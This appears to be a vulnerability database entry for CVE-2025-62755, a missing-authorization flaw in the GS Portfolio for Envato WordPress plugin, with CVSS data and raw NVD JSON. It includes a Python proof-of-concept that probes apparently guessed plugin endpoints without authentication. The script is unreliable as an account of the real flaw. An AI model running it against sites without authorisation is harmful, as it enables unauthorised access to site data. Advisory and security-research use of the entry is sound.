Security Vulnerability Report
中文
CVE-2025-62755 CVSS 5.3 MEDIUM

CVE-2025-62755

Published: 2025-12-31 16:15:47
Last Modified: 2026-04-23 15:34:41

Description

Missing Authorization vulnerability in GS Plugins GS Portfolio for Envato gs-envato-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GS Portfolio for Envato: from n/a through <= 1.4.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

GS Portfolio for Envato <= 1.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62755 PoC - Missing Authorization in GS Portfolio for Envato # Affected Version: <= 1.4.2 # Type: Broken Access Control import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-62755 This vulnerability allows unauthorized access to plugin functions """ # Common endpoints that might be affected endpoints = [ "/wp-json/gs-envato-portfolio/v1/settings", "/wp-json/gs-envato-portfolio/v1/portfolio", "/wp-admin/admin-ajax.php?action=gs_envato_portfolio" ] print(f"[*] Testing target: {TARGET_URL}") print(f"[*] CVE-2025-62755 - Missing Authorization in GS Portfolio for Envato") print("=" * 60) for endpoint in endpoints: url = TARGET_URL + endpoint print(f"\n[*] Testing endpoint: {endpoint}") try: # Send request without authentication response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] POTENTIALLY VULNERABLE - Status: {response.status_code}") print(f"[+] Response preview: {response.text[:200]}...") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected - Status: {response.status_code}") else: print(f"[*] Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") def exploit_unauthorized_access(): """ Attempt to exploit the missing authorization Modify the target URL and endpoint according to your target """ # Example: Try to access settings without authentication exploit_url = f"{TARGET_URL}/wp-json/gs-envato-portfolio/v1/settings" print(f"\n[*] Attempting unauthorized access...") # GET request without cookies/authentication response = requests.get(exploit_url) if response.status_code == 200: print("[!] VULNERABLE: Unauthorized access successful!") print(f"[!] Response data: {response.text}") return True else: print(f"[*] Request returned status: {response.status_code}") return False if __name__ == "__main__": check_vulnerability() print("\n[*] Scan complete") print("[*] Note: Manual verification recommended")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62755", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:47.240", "lastModified": "2026-04-23T15:34:40.953", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in GS Plugins GS Portfolio for Envato gs-envato-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GS Portfolio for Envato: from n/a through <= 1.4.2."}, {"lang": "es", "value": "Control de acceso roto no autenticado en GS Portfolio para Envato versiones &lt;= 1.4.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gs-envato-portfolio/vulnerability/wordpress-gs-portfolio-for-envato-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}